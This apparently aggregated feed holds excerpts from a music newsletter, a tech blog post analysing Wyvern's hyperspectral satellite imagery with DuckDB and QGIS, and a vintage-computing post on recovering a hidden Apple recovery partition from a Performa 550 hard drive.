The fact that Valli topped the charts again in 1978 with “Grease” still boggles my mind. I don’t think anybody who heard “Sherry” in 1962 thought that he’d be within a country mile of the charts 12 years later. By the time the hit musical Jersey Boys was made about his life in 2005, his legend was firmly established. But long before that, I was tipping my cap to him.
I’ll admit that I hopped on the Doechii train late. Like many others, I first listened to her album Alligator Bites Never Heal after it won Best Rap Album at the 67th Grammy Awards. No matter how late I was, I’m happy that I’m here now. Not only is Doechii dextrous as a rapper but all of her beats are groovy and twitchy in a way that feels fresh. “Nosebleeds,” her victory lap after the Grammy win, has all of those things on display.
As I was admiring 1964, I noticed that the week of October 10 had a mind-blowing top five. It included Roy Orbison’s “Oh, Pretty Woman,” Manfred Mann’s “Do Wah Diddy Diddy,” Martha & the Vandellas’ “Dancing in the Street,” and The Shangri-Las’ “Remember (Walkin’ in the Sand).” There was one song that I wasn’t familiar with, though: “Bread and Butter” by The Newbeats.
“Bread and Butter” is a fun little novelty about bread, butter, toast, jam, and losing your lover. The most notable thing about the song is a half-screamed falsetto that appears periodically throughout the song as performed by Larry Henley. Incidentally, Henley is another good example of musical resilience. After his performing career ended, he wrote a few hits over the decades, including Bette Midler’s massive 1989 ballad “Wind Beneath My Wings.”
Shout out to the paid subscribers who allow this newsletter to exist. Along with getting access to our entire archive, subscribers unlock biweekly interviews with people driving the music industry, monthly round-ups of the most important stories in music, and priority when submitting questions for our mailbag. Consider becoming a paid subscriber today!
Recent Paid Subscriber Interviews: Pitchfork’s Editor-in-Chief • Classical Pianist • Spotify’s Former Data Guru • Music Supervisor • John Legend Collaborator • Wedding DJ • What It’s Like to Go Viral • Adele Collaborator
Recent Newsletters: Personalized Lies • The Lostwave Story • Blockbuster Nostalgia • Weird Band Names • Recorded Music is a Hoax • A Frank Sinatra Mystery • The 40-Year Test
Want to hear the music that I make? Check out my latest single “Overloving” wherever you stream music.
...
Read the original on www.cantgetmuchhigher.com »
Last month, Wyvern, a 36-person start-up in Edmonton, Canada with $16M USD in funding, launched an open data programme for their VNIR, 23 to 31-band hyperspectral satellite imagery.
The imagery was captured with one of their three Dragonette 6U CubeSat satellites. These satellites were built by AAC Clyde Space, which has offices in the UK, Sweden and a few other countries. They orbit 517 to 550 km above the Earth’s surface and have a spatial resolution at nadir (GSD) of 5.3 m.
SpaceX launched all three of their satellites from Vandenberg Space Force Base in California. They were launched on April 15th, June 12th and November 11th, 2023 respectively.
There are ~130 GB of GeoTIFFs being hosted in their AWS S3 bucket in Montreal. The 33 images posted were taken between June and two weeks ago.
I’m using a 5.7 GHz AMD Ryzen 9 9950X CPU. It has 16 cores and 32 threads and 1.2 MB of L1, 16 MB of L2 and 64 MB of L3 cache. It has a liquid cooler attached and is housed in a spacious, full-sized Cooler Master HAF 700 computer case.
The system has 96 GB of DDR5 RAM clocked at 4,800 MT/s and a 5th-generation, Crucial T700 4 TB NVMe M.2 SSD which can read at speeds up to 12,400 MB/s. There is a heatsink on the SSD to help keep its temperature down. This is my system’s C drive.
The system is powered by a 1,200-watt, fully modular Corsair Power Supply and is sat on an ASRock X870E Nova 90 Motherboard.
I’m running Ubuntu 24 LTS via Microsoft’s Ubuntu for Windows on Windows 11 Pro. In case you’re wondering why I don’t run a Linux-based desktop as my primary work environment, I’m still using an Nvidia GTX 1080 GPU which has better driver support on Windows and I use ArcGIS Pro from time to time which only supports Windows natively.
I’ll use GDAL 3.9.3, Python 3.12.3 and a few other tools to help analyse the data in this post.
I’ll set up a Python Virtual Environment and install some dependencies.
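Something along these lines; the exact package list isn't spelled out here, so the dependency is an assumption:

python3 -m venv ~/.wyvern
source ~/.wyvern/bin/activate

pip install skyfield  # assumed: used for the satellite position estimates below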
I’ll use my GeoTIFFs analysis utility in this post.
I’ll use DuckDB, along with its H3, JSON, Lindel, Parquet and Spatial extensions, in this post.
I’ll set up DuckDB to load every installed extension each time it launches.
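One way to do that is a ~/.duckdbrc that installs and loads everything up front (h3 and lindel live in DuckDB's community extension repository):

INSTALL h3 FROM community;
INSTALL lindel FROM community;
INSTALL json;
INSTALL parquet;
INSTALL spatial;

LOAD h3;
LOAD lindel;
LOAD json;
LOAD parquet;
LOAD spatial;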
The maps in this post were rendered with QGIS version 3.42. QGIS is a desktop application that runs on Windows, macOS and Linux. The application has grown in popularity in recent years and has ~15M application launches from users all around the world each month.
I used QGIS’ Tile+ plugin to add geospatial context with Bing’s Virtual Earth Basemap as well as CARTO’s to the maps. The dark, non-satellite imagery maps are mostly made up of vector data from Natural Earth and Overture.
Below is PulseOrbital’s list of estimated Tallinn flyovers by Wyvern’s Dragonette constellation for March 8th and 9th, 2025.
Below I’ll try to estimate the current locations of each of their three satellites. I found the Two-line elements (TLE) details on n2yo.
I ran the following on March 10th, 2025. It produced a CSV file with names and estimated locations of their three satellites.
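A sketch of the idea using skyfield (the TLE strings and output file name below are placeholders; the real TLE lines came from n2yo):

import csv

from skyfield.api import EarthSatellite, load, wgs84

tles = {
    'DRAGONETTE-001': ('1 ...', '2 ...'),  # placeholder TLE lines
    'DRAGONETTE-002': ('1 ...', '2 ...'),
    'DRAGONETTE-003': ('1 ...', '2 ...'),
}

ts = load.timescale()
now = ts.now()

with open('dragonettes.csv', 'w', newline='') as f:
    writer = csv.writer(f)
    writer.writerow(['name', 'latitude', 'longitude', 'elevation_km'])

    for name, (line1, line2) in tles.items():
        sat = EarthSatellite(line1, line2, name, ts)

        # Propagate to "now" and convert to a lat/lon/elevation sub-point
        pos = wgs84.geographic_position_of(sat.at(now))
        writer.writerow([name,
                         round(pos.latitude.degrees, 4),
                         round(pos.longitude.degrees, 4),
                         round(pos.elevation.km, 1)])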
Below is a rendering of the above CSV data in QGIS.
Wyvern have a STAC catalog listing the imagery locations and metadata around their capture. I’ll download this metadata and get each image’s address details with Mapbox’s reverse geocoding service. Mapbox offer 100K geocoding searches per month with their free tier.
The above produced a 33-line JSONL file. Below is an example record.
I’ll load their imagery metadata into DuckDB for analysis.
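Presumably something like this; the JSONL file name is assumed:

CREATE OR REPLACE TABLE images AS
    SELECT *
    FROM read_json_auto('images.jsonl',
                        format='newline_delimited');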
Below are the image counts by country and city. Some areas are rural and Mapbox didn’t attribute any city to the image footprint’s location.
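The underlying query would be along these lines; the column names are an assumption based on the Mapbox address fields:

SELECT country,
       city,
       COUNT(*) AS num_images
FROM   images
GROUP BY 1, 2
ORDER BY 3 DESC;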
Below are the locations of the images.
These are the months in which the imagery was captured.
The majority of imagery is from their first satellite but there are four images from their third. Their second and third satellites can collect a wider spectral range, with more spectral bands at a greater spectral resolution.
All of the imagery has been processed to level L1B and, with the exception of one image, to version 1.3.
Below I’ll bucket the amount of cloud cover in their imagery to the nearest 10%.
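Likely via something like the following; the field name is an assumption (STAC items usually call it eo:cloud_cover):

SELECT ROUND("eo:cloud_cover" / 10) * 10 AS cloud_cover_pct,
       COUNT(*) AS num_images
FROM   images
GROUP BY 1
ORDER BY 1;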
The imagery Wyvern delivers are Cloud-Optimised GeoTIFF containers. These files contain Tiled Multi-Resolution TIFFs / Tiled Pyramid TIFFs. This means there are several versions of the same image at different resolutions within the GeoTIFF file.
These files are structured so it’s easy to only read a portion of a file for any one resolution you’re interested in. A file might be 100 MB but a JavaScript-based Web Application might only need to download 2 MB of data from that file in order to render its lowest resolution.
The following downloaded 130 GB of GeoTIFFs from their feed.
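A sketch of that download step, assuming each JSONL record carries STAC-style assets with href fields pointing at the GeoTIFFs:

import json
import os
import urllib.request

with open('images.jsonl') as f:
    for line in f:
        item = json.loads(line)

        for asset in item.get('assets', {}).values():
            url = asset['href']
            filename = os.path.basename(url)

            # Only fetch GeoTIFFs we don't already have locally
            if filename.endswith('.tiff') and not os.path.exists(filename):
                print('Downloading %s' % filename)
                urllib.request.urlretrieve(url, filename)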
Below you can see the five resolutions of imagery with the following GeoTIFF. These range from 6161-pixels wide down to 385-pixels wide.
Below is a 23 x 30 KM image of Los Angeles.
This is its metadata for reference.
The following bands are present in the above image.
Most images contain 23 bands of data though there are four images in this feed that contain 31 bands.
If you open the properties for the above image’s layer in QGIS and select the “Symbology” tab, you can re-map the bands being used for the red, green and blue channels being rendered. Try the following:
Under the “Min / Max Value Settings” section, check the radio button next to “Min / max”.
Below is what the settings should look like:
Hit “Apply” and the image should look more natural.
Below is a comparison to Bing’s imagery for this area.
Below is a comparison to Esri’s imagery for this area.
Below is a comparison to Google’s imagery for this area.
Below is a comparison to Yandex’s imagery for this area.
QGIS 3.42 was released a few weeks ago and now has STAC catalog integration.
From the Layer Menu, click Add Layer -> Add Layer from STAC Catalog.
Give the layer the name “wyvern” and paste in the following URL:
Below is what the fields should look like.
Click OK, then Close on the next dialog and return to the main UI. Don’t click the connect button as you’ll receive an error message and it isn’t needed for this feed.
Click the View Menu -> Panels -> Browser Panel. You should see a STAC item appear in that panel and underneath you should be able to browse the various collections Wyvern offer.
Right clicking any asset lets you both see a preview and details on the imagery. You can also download the imagery to your machine and into your QGIS project.
Thank you for taking the time to read this post. I offer both consulting and hands-on development services to clients in North America and Europe. If you’d like to discuss how my offerings can help your business please contact me via LinkedIn .
...
Read the original on tech.marksblogg.com »
In my last post about hard drives that go bad over time, I hinted at having rescued a lost piece of obscure Apple software history from an old 160 MB Conner hard drive that had its head stuck in the parked position. This post is going to be all about it. It’s the tale of a tad bit of an obsession, what felt like a hopeless search, and how persistence eventually paid off. There’s still an unsolved mystery too, so I’m hoping others will see this and help to fill in the blanks!
This whole saga starts with a very interesting blog post written by Pierre Dandumont in 2022. Pierre’s (excellent) blog is in French — Google does a good job of translating it for me. He found a quote in a book referring to special functionality bundled with Apple’s Macintosh Performa 550 computer:
If Apple’s programmers, in creating the Performa series, were aiming to make idiot-proof computers, they were serious about it. The Performa 550 is an amazing case in point. When you run the included Apple Backup program (see Chapter 15), you get a little surprise that you didn’t count on: a hidden partition on your hard drive!
This invisible chunk of hard drive space contains a miniature, invisible System Folder. Apple’s internal memo explains it this way:
“When a system problem (one that prevents the Performa from booting) is detected, a [dialog box] informs the user of a system problem. The user can choose to fix the problem manually or to reinstall software from the backup partition’s Mini System Folder.”
If you choose to reinstall your System software, you get the wristwatch cursor for a moment while the miniature System Folder is silently copied to your main hard-drive partition. The Performa restarts from the restored hard drive, and the invisible system partition disappears once again.
We got a Performa team member to admit that this kind of sneaky save-the-users-from-themselves approach may well be adopted in other Performa models.
Who knows what goodness lurks in the hearts of men?
Cool! Although I have owned my own copy of this book for decades, I had no recollection of ever reading this little blurb. The book, if you’re curious, is Macworld Mac Secrets by David Pogue and Joseph Schorr. I found this whole functionality very intriguing, particularly because I had what felt like a very personal connection to it: the very first Mac that my family had when I was growing up was a Performa 550. I don’t think I have any pictures from back then, but in the meantime I’ve acquired one that looks exactly identical, so here’s a (slightly blurry) view of the type of machine I’m talking about in this post:
I know that many people think the LC/Performa 5xx case style is ugly, but I really like it! I’m definitely biased though.
This is an early model manufactured in September of 1993, which came with a caddy-loading CD-ROM drive (AppleCD 300i). Like other Macs from the same era, newer versions from 1994 came with a tray-loading drive instead (AppleCD 300i Plus). For comparison, here’s a photo of a late-model Performa 550 with a manufacture date of March 1994 that re4mat kindly gave me permission to share here:
Pierre asked me if I had a copy of Apple’s software restoration CD for the Performa 550, and if I knew how to get it working in an emulator in order to try out this special functionality. I pointed him to a download link for the Performa CD for the 500 Series, version 7.1P6:
If you weren’t using multimedia computers in the early 1990s, you might not recognize the weird rectangular container that this CD is enclosed inside of. It’s a CD caddy, and it’s what was used for inserting CDs into computers like the first one pictured above. You would open the caddy by squeezing the top right and bottom right ends toward each other, stick the disc into it, close it, and then push it into the slot in the computer, similarly to how you would insert a floppy disk. I really don’t miss these things one bit!
Back to the story, though. I also gave Pierre some tips for using the restore CD in an emulator. Nowadays, my advice is outdated because it’s much easier to use Apple restore CDs in at least one emulator — MAME has come a long way in the last few years. He figured out a bunch more stuff on his own after that, including trying it in his own Performa 450 (not 550), but the bottom line was that the recovery partition was nowhere to be found.
Well, sort of. He found that the process of restoring from the CD actually did create a recovery partition. Here’s a screenshot of the partitioning from inside of Apple HD SC Setup while booted from the Performa CD, after formatting the hard drive by clicking the Initialize button in the main window:
As you can see, there’s a 2,560 KB partition of type Apple_Recovery almost at the end of the drive, just after the main partition named “Hard Disk”. This was promising at first glance, but the partition was empty! Further testing revealed that the custom Performa-specific version of Apple HD SC Setup (7.2.2P6) bundled on the CD was responsible for creating it, but didn’t actually populate it with any data. Apple Backup also didn’t put anything onto the partition, despite what the book said. I even looked through my past disassemblies of the Apple Backup and Apple Restore code and confirmed that there was nothing related to creating a recovery partition.
The conclusion at the time was that someone needed to get ahold of a Performa 550 that still had its original hard drive and had never been reformatted. That’s where this story sat for 3 years.
A few months ago, I remembered this whole situation and decided that I really wanted to try to find this partition. After all, the clock had always been ticking. The longer we waited, the fewer and fewer original Performa 550s would be out there in the wild. Not to mention that hard drives go bad and people throw them out without knowing that it’s usually possible to recover data from drives of this era. I confirmed all of Pierre’s findings in MAME. I even tried using Apple Backup in case I missed something, but no, it didn’t do anything with the hidden recovery partition. An easy way to look at it is to manually edit the partition table in a hex editor and change the type from Apple_Recovery to Apple_HFS.
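Against a raw disk image, a sketch like this would do it (the file name is made up, and it assumes the type string only appears in the Apple Partition Map entry, where it is stored as a zero-padded ASCII string):

# Rename the partition type in a raw disk image so the volume becomes visible.
data = bytearray(open('performa550.img', 'rb').read())

off = data.find(b'Apple_Recovery')
if off >= 0:
    patch = b'Apple_HFS'.ljust(len('Apple_Recovery'), b'\x00')
    data[off:off + len(patch)] = patch
    open('performa550-patched.img', 'wb').write(bytes(data))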
After doing this and booting up, I found another hard drive icon on my desktop called Recovery Volume, but it was empty, just like Pierre said:
Taking it a bit further, I tried recreating the recovery functionality myself. I copied a minimal system folder to the Recovery Volume, and then changed its type back to Apple_Recovery. This made it invisible again. Then I screwed up my main system folder and rebooted. Sure enough, it automatically came up with the Recovery Volume as the main boot volume.
This proved that the mechanism for booting from the recovery partition worked; we were just missing the data that was supposed to be on it. I came to the same conclusion that Pierre had already reached: we needed to find a Performa 550 that had never been reformatted. In the meantime, I spent some time digging into archives of Apple’s old tech notes and found several more references to this functionality.
System 7: Performa Versions Compared (9/95) — the first bullet point under System Software Version 7.1P6 refers to this feature:
Backup Partition Software - automatically detects corrupted system folders. When a bad System Folder is detected, the user is given the option to re-load another System Folder into their system.
Performa 550: Description of Backup Partition (3/94) — this note is clearly the “internal memo” that Macworld Mac Secrets was quoting. Some interesting excerpts from this article:
The Apple Backup application creates a backup recovery partition that allows the Performa to boot even when the System Software on the main hard drive has been corrupted. The partition is invisible to the user.
There is no built-in limit to the number of times the backup partition can be used. However, the partition will be lost if the hard drive is re-formatted. At this time the backup partition is used only on the Performa 550.
Performa 550: System Folder Created w/ Dinosaur Safari CD (8/94) — not that I needed any more proof of the recovery partition’s existence at this point, but I got a kick out of this one. It talks about how launching an educational game about dinosaurs accidentally caused the system to go into recovery mode. It provided a little more info about what would happen when the recovery dialog popped up:
When I launch the Dinosaur Safari CD from Creative Multimedia, a dialog box appears telling me that my Performa computer is having trouble starting up. I only have two options: Shutdown or Continue? Why?
After reading these articles, I was very convinced that the recovery partition was a real thing that existed, but I was also pretty confident that Apple Backup wasn’t responsible for creating it, despite Apple claiming otherwise. I had already seen that the special build of Apple HD SC Setup was what actually created it, and plus, like I said earlier, I had looked closely into a disassembly of the version of Apple Backup supplied with the Performa 500 series restore CD. There was nothing that copied any files to another partition on the hard drive, at least not that I could see.
Really, the most important thing I gained from this exercise was that the second tech note confirmed the need to find a Performa 550 that had never been reformatted. Also, if the first tech note was to be believed, it needed to have come with System 7.1P6. This could narrow the search even further — I know for a fact that earlier Performa 550 models came with 7.1P5, including my childhood one. The same tech note also pointed out that 7.1P6 was the first version to support the “AppleCD 300+”, which refers to the tray-loading CD-ROM drive. Based on this information, it’s reasonable to deduce that all Performa 550s with a tray-loading CD-ROM drive would probably have originally come with at least System 7.1P6.
There was only one thing left to try at this point: asking the Internet for help. I asked people everywhere I could think of: Tinker Different, 68kMLA (where Pierre had already asked), and various social media sites. I searched Reddit and found people who had posted in the past about having a 550, asking if they still had the hard drive. I think I scared some of them — at least one person deleted their post after I asked! To be honest, I can’t blame them. I can imagine how freaky it would be to hear from someone begging to look at my hard drive’s contents. I’m sure some people might think of it as crossing a line, but it’s not as crazy of an ask if it’s a machine they’ve received second-hand from someone else. Plus, I was very clear about exactly what I was looking for (and why).
I asked a seller of a Performa 550 that had been sitting on eBay for a long time if they would be willing to sell me the hard drive separately. They weren’t interested. I even bought some random hard drives on eBay that definitely went with a 5xx-style case. These were easy to identify because this case style uses a unique adapter for plugging the drive into the chassis wiring harness when you slide it into place.
What do I have to show for all of these eBay purchases? Well, after dumping them all with my ZuluSCSI in initiator mode, I can say that the one pictured above came from a Macintosh TV. I also found another one from an LC 575. Lastly, I bought yet another drive that the seller said came from a Performa 577. The Performa 577 one was funny — it had all the Mac mounting hardware on it, but when I dumped it, it turned out to be from an Atari TT or Falcon (not sure which). I’d love to hear the story of how it ended up with an LC 5xx drive sled and adapter on it! Needless to say, none of them had the elusive recovery partition. One particularly friendly eBay seller was even nice enough to show me a preview of a drive’s contents in HFSExplorer, which helped me determine that it wasn’t from a Performa.
I almost began questioning my sanity at one point during this search. Multiple people initially told me that they thought I was confused about this whole thing. I pointed them toward Apple’s tech notes describing it. Were Pierre and I imagining this whole thing? Were Apple’s tech notes all a lie?
The thing is, this whole functionality was super obscure. It’s understandable that people weren’t familiar with it. Apple publicly stated it was only included with this one specific Performa model. Their own documentation also said that it would be lost if you reformatted the hard drive. It was hiding in the background, so nobody really knew it was there, let alone thought about saving it. Also, I can say that the first thing a lot of people do when they obtain a classic computer is erase it in order to restore it to the factory state. Little did anyone know, if they reformatted the hard drive on a Performa 550, they could have been wiping out rare data that hadn’t been preserved!
Someone who saw my post on Reddit mentioned that they had a Performa 550 and would check it out. It was a newer tray-loading model with a January 1994 manufacture date. Unfortunately, the Conner hard drive inside of it wouldn’t cooperate, and plus this person didn’t have anything capable of dumping the contents. Luckily for me though, they were totally comfortable with letting me borrow the drive and try to recover the data from it.
To tie everything together, we have now reached the point in this story that I covered in my last post about hard drives with stuck heads. As I mentioned in that blog, I could not get this drive to do anything. It would just spin up, sit there for a while, spin down, and then make an annoying buzzing sound for a while, repeating that whole process over and over again.
I tried all kinds of things. I nudged the head while the platters were spinning, inspected it with my thermal camera to see if any components were getting hot, and tried it at different temperatures — cold shortly after it arrived, and at room temperature later. The only thing I noticed was that when it was making the buzzing sound, one of the IRFD123 MOSFETs would get much hotter than normal: up near 100 degrees Celsius.
I wasn’t really sure what to do with this information though. It just seemed wrong that the head wasn’t moving at all. That’s when I finally decided to inspect everything further inside the drive and noticed that the head stack seemed to be sticking to a rubber/plastic-looking piece. The Kapton tape trick I figured out and showed off in the last post finally allowed me to dump the drive contents. If you didn’t catch it last time, here’s a video showing how it was stuck, along with a successful dump with the help of the tape:
As soon as the drive imaging process completed, I powered everything off and anxiously opened the hard drive image file with my favorite hex editor (HxD):
Boom! This drive had a recovery partition on it! Now, that didn’t necessarily mean anything. After all, I had already seen an empty partition created by Apple HD SC Setup on the Performa CD. Still, though, it was definitely promising. Here’s an interpretation of the data at the beginning of the entry in the partition table:
50 4D = PM = Signature
00 00 = Padding
00 00 00 05 = 5 total partitions on the drive
00 04 E2 60 = starting physical block of the partition (0x4E260 blocks = 0x9C4C000 bytes)
00 00 14 00 = size of partition in blocks (0x1400 blocks = 0x280000 bytes = 2560 kilobytes)
name = MacOS
type = Apple_Recovery
Also, just like in the partition table created by the Performa CD that I had inspected earlier, there were four bytes “msjy” at an offset of 0x9C bytes into the partition table entry. No other partitions had any data at 0x9C. I wonder if these are a couple of developers’ initials hiding in there or something? Is it an acronym? “Make Steve Jobs Yodel”? I even asked ChatGPT to come up with a playful interpretation in the context of Macs in the mid-1990s. It suggested “My System Jammed Yesterday”, explaining it as a playful nod to the “chaotic charm” of the era’s extension conflicts and Sad Mac screens. I didn’t even mention anything about it involving OS recovery. Tell me how you really feel about old Macs, ChatGPT!
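Joking aside, here’s a minimal Python sketch that walks the whole partition map and decodes the same fields for every entry, including whatever sits at offset 0x9C. The field offsets come from the Partition record documented in Inside Macintosh; the file name is a placeholder:

import struct

# Sketch: print name, type, byte offset, byte size, and the mystery bytes
# at 0x9C for every Apple Partition Map entry in a raw drive image.
def dump_partition_map(path):
    with open(path, "rb") as f:
        entry = 1
        while True:
            f.seek(entry * 512)
            data = f.read(512)
            if data[0:2] != b"PM":                               # past the last map entry
                break
            start, size = struct.unpack_from(">II", data, 8)      # pmPyPartStart, pmPartBlkCnt
            name = data[16:48].rstrip(b"\x00").decode("mac_roman")   # pmPartName
            ptype = data[48:80].rstrip(b"\x00").decode("mac_roman")  # pmParType
            extra = data[0x9C:0xA0]                               # b'msjy' on the recovery entry
            print(name, ptype, hex(start * 512), hex(size * 512), extra)
            entry += 1

dump_partition_map("dumped_drive.img")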
Knowing that the partition was there, the next step was to look near the end of the dumped drive image in HxD. If the partition held anything, it would be very obvious: starting at 0x9C4C000 in the file, there would be real data instead of just a bunch of zeros.
This is where I started to actually get excited. The partition contained boot blocks! This was obvious because of the starting signature of LK and all of the various system file names plainly visible. On the other hand, the recovery partition created by the Performa CD during testing had zeros at this location — no boot blocks.
These boot blocks are identical to the main partition’s boot blocks, except for one very important difference: at 0x1A, the Pascal string containing the Finder name is “recovery” instead of “Finder” like you’d normally see. This means that if you boot from this partition, it will load a program named recovery instead of the usual Finder app you’d expect on most Mac OS installs.
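If you want to verify this against a drive image yourself, here’s a tiny sketch. The partition offset comes from the partition table entry shown earlier (0x4E260 blocks × 512 bytes = 0x9C4C000), and the image file name is a placeholder:

# Sketch: check the recovery partition's boot block signature and read the
# Pascal string naming the shell (normally "Finder") at offset 0x1A.
with open("dumped_drive.img", "rb") as f:
    f.seek(0x9C4C000)                    # start of the Apple_Recovery partition
    boot = f.read(1024)                  # the two 512-byte boot blocks
assert boot[0:2] == b"LK"                # boot block signature
shell_len = boot[0x1A]                   # Pascal string: length byte comes first
print(boot[0x1B:0x1B + shell_len].decode("mac_roman"))   # prints "recovery"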
This was definitely something special that the restore CD was not capable of recreating. As I scrolled further down through the partition, it quickly became obvious that it actually had some files!
Okay, now I was totally stoked! I booted up a copy of the imaged drive in MAME and immediately noticed that there was evidence that the recovery partition had definitely activated itself on this machine in the past: there was a folder named Mini System Folder on the desktop with a creation date in 2004, and the trash contained an app called Read Me Mini System Folder with the exact same date.
I wanted to experience the automatic OS recovery process for myself without any customizations from the original owner of the machine this hard drive came from, so I used HxD to copy the entire 2,560 KB recovery partition onto the fresh hard drive image I had created by restoring from the Performa CD. This was easy because the Performa version of Apple HD SC Setup had created an empty recovery partition with the exact same size. Then I booted it up in MAME and dragged the System file out of my System Folder in order to intentionally mess it up. I had to turn off System Folder Protection in the Performa control panel first:
This is the classic kind of mistake that would have normally left you with an unbootable system showing a floppy disk icon with a flashing question mark. Would Apple’s automatic Performa OS recovery save me from myself? I rebooted to see what would happen. Instead of seeing a flashing question mark, I saw a Happy Mac very briefly before the system rebooted itself again. Then another Happy Mac showed up, and this time, it looked like a normal boot, except no extension icons showed up at the bottom of the screen. It was definitely booting from the recovery partition. Eventually, I was greeted with this screen:
Hooray! This was exactly the dialog box that Macworld Mac Secrets and Apple’s tech note had referred to. The recovery partition had been successfully rescued!
Let’s walk through the rest of this feature. If you click Shut Down, obviously the machine turns itself off. But when it boots back up, the recovery partition doesn’t automatically kick in anymore. So you’re on your own to fix the problem by booting from the Performa CD or the Utilities floppy disk.
On the other hand, clicking OK does exactly what the tech note describes. You get the wristwatch cursor for a few seconds, the system reboots, and then you are greeted with this amazing screen, complete with an ugly yellow desktop pattern. Shall we call it the yellow screen of shame? Notice that the Mini System Folder on the desktop is the active System Folder, because it has the special icon.
Here are the rest of the pages in this Read Me Mini System Folder app:
Aha! So it’s not entirely automatic, since you still have to manually drag the System, Finder, and System Enablers from the Mini System Folder back to your original System Folder. Still though, it’s a very handy solution that gives you a bootable machine when something goes wrong with your OS.
If you just ignore these instructions and keep using the computer, you will be nagged with this Read Me on every boot because it lives inside the Startup Items folder of the Mini System Folder. The Read Me also appears on your desktop, but for some reason it doesn’t show up until you open the Hard Disk icon.
Let’s take a deeper look at how it all works by temporarily changing the partition type to Apple_HFS instead of Apple_Recovery and booting up again, so we can inspect the files. After a quick automatic rebuild of the desktop file, the Recovery Volume appears, with actual contents this time!
Inside of the System Folder, there are definitely some interesting things. As expected based on the earlier analysis of the boot blocks, there is an app named “recovery” that contains all of the interesting stuff. The icons are kind of arranged willy-nilly in here.
The creator code of the recovery app is msjy — the exact same magic value we saw in the partition table entry.
Scrolling further down, there is a System file and various enablers. Everything is marked as being part of System Software v7.1P6.
It’s interesting to me that although this recovery partition was only available on the 550, it still has a bunch of enablers for other Performa models: the 45x/46x, 47x/57x, and 600. I guess that’s not too crazy considering all of these exact same enablers are included with a fresh copy of System 7.1P6 installed using the Performa CD.
As a quick detour, System Enabler 316 is an interesting one that is hard to find info about on the Internet. I inspected its ‘gbly’ resource and determined that it’s for the Centris 610, Centris 650, and Quadra 800. It’s an older version of the enabler created before the speed-bumped Quadra 610 and Quadra 650 were a thing. I wonder if there was a plan at some point to have a Performa model based on one of those machines? If I had to guess, maybe it would have been a 68040-based successor to the Performa 600, which uses the same case style as the Centris 650. The Performa 650?
Let’s not get too far off track. Back to the Recovery Volume’s System Folder — as expected, the Startup Items folder contains the Read Me application:
Everything started to become clear. The recovery app was marked as the startup application instead of the Finder. It displayed the dialog giving the user the option to recover. If they clicked OK, it would copy the entire System Folder from the Recovery Volume, omitting itself, to the Desktop Folder of the main hard drive partition. Then, it would “bless” the newly-copied mini System Folder and reboot.
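As a quick aside on what “blessing” actually means at the disk level: on HFS, the blessed System Folder’s directory ID lives in the first longword of the Finder info in the volume’s Master Directory Block. Here’s a minimal sketch of reading it; the partition offset is a parameter you’d fill in from the partition map:

import struct

# Sketch: read the blessed (bootable) folder ID from an HFS volume's
# Master Directory Block, which sits 1024 bytes into the partition.
def blessed_folder_id(path, part_offset):
    with open(path, "rb") as f:
        f.seek(part_offset + 1024)       # the MDB lives at logical block 2
        mdb = f.read(128)
    assert mdb[0:2] == b"BD"             # drSigWord marks an HFS volume
    return struct.unpack_from(">I", mdb, 0x5C)[0]   # drFndrInfo[0] = blessed dir ID

Presumably the recovery app updates this value in the main partition’s MDB to point at the newly-copied Mini System Folder before rebooting.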
How did all this stuff get into the partition? Did Apple Backup do it, or was it factory-programmed data? I tried to see if I could deduce anything from the dates of the files. In order to preserve the integrity of all of the displayed dates, I performed this analysis with a read-only copy of the original drive image in order to prevent any modification dates from being updated.
All of the files in the partition have a creation date of March 4, 1994 — over 31 years ago! Most of the files have a matching modification date, except for the System suitcase, which was last modified on September 26, 1994. I don’t know exactly what this all means, considering it came from a machine with a January 1994 manufacture date.
The Recovery Volume itself also has a creation date of March 4th, just five minutes before the creation date of all the files. Interestingly, the modification date of the volume is still shown as March 4th in the Get Info window, even though the System suitcase was modified later in September of that year.
The Master Directory Block of the Recovery Volume says the modification date (drLsMod) is September 26th, matching when the System file was changed. I’m not sure what causes this discrepancy. I guess the date displayed in the Get Info window isn’t simply the date stored in the Master Directory Block.
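For anyone curious, HFS stores these timestamps as seconds since January 1, 1904 (in local time), so you can read drCrDate and drLsMod straight out of the image. A minimal sketch, reusing the recovery partition offset from earlier (the image file name is a placeholder):

import struct
from datetime import datetime, timedelta

HFS_EPOCH = datetime(1904, 1, 1)         # HFS counts seconds from here, local time

# Sketch: decode the creation/modification dates straight out of the MDB.
with open("dumped_drive.img", "rb") as f:
    f.seek(0x9C4C000 + 1024)             # the Recovery Volume's MDB
    mdb = f.read(16)
cr_date, ls_mod = struct.unpack_from(">II", mdb, 2)   # drCrDate, drLsMod
print("created: ", HFS_EPOCH + timedelta(seconds=cr_date))
print("modified:", HFS_EPOCH + timedelta(seconds=ls_mod))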
Similarly, although the main hard drive partition has a creation date of December 5, 1993 according to the Master Directory Block, the Get Info window says it was created on February 3, 1994. I’m not sure which one is more accurate. Either way, it’s pretty clear this drive had not been reformatted. I did find it curious that the recovery partition was created over a month later, though. When you reformat a hard drive using the special version of Apple HD SC Setup on the Performa CD, the recovery partition ends up with a creation date about a minute after the main partition.
The Finder and System Enablers in the recovery partition are identical to the same stock files from a 7.1P6 restore. The only difference I could find in the System file was that the recovery partition’s version was missing a single At Ease ‘INIT’ resource, but the At Ease Startup extension automatically adds it to the System file after you reboot. This leaves you with a System file totally identical to what is restored from the Performa CD. I find it odd that At Ease was stripped out, but the American Heritage Dictionary ‘FKEY’ resource was not.
The best theory that I can come up with is that Apple Backup really was responsible for creating this partition. After all, Apple went out of their way to specifically mention it in their tech note. Maybe March 4th, 1994 was the date when the original owner of the computer backed it up for the first time. September 26th could have been the last time that Apple Backup was run. Perhaps the owner completely uninstalled At Ease from the computer between March and September, so the System file had been changed and the recovery copy needed to be updated accordingly? Unfortunately, most of the Performa-specific software had been deleted from this computer. It was still running System 7.1P6, but Apple Backup was nowhere to be found. So I wasn’t able to confirm whether or not a mysterious, unpreserved newer version of Apple Backup was really responsible for populating the partition.
The other theory floating around in my head is that maybe it came from the factory like this. The March 1994 timeline is consistent with the date of the tech note describing the functionality, so maybe that’s when Apple created it and started bundling it. I don’t know how long the machines sat at Apple’s factory before they were actually sold — does a manufacture date of January 1994 also mean it was shipped to a store in January 1994? Either way, I definitely don’t know how to explain the September 26th, 1994 modification date. Maybe a third-party utility did something to the System file on the secondary partition? The first Apple Backup theory seems like the more likely explanation, especially given that Apple said that’s how it was created.
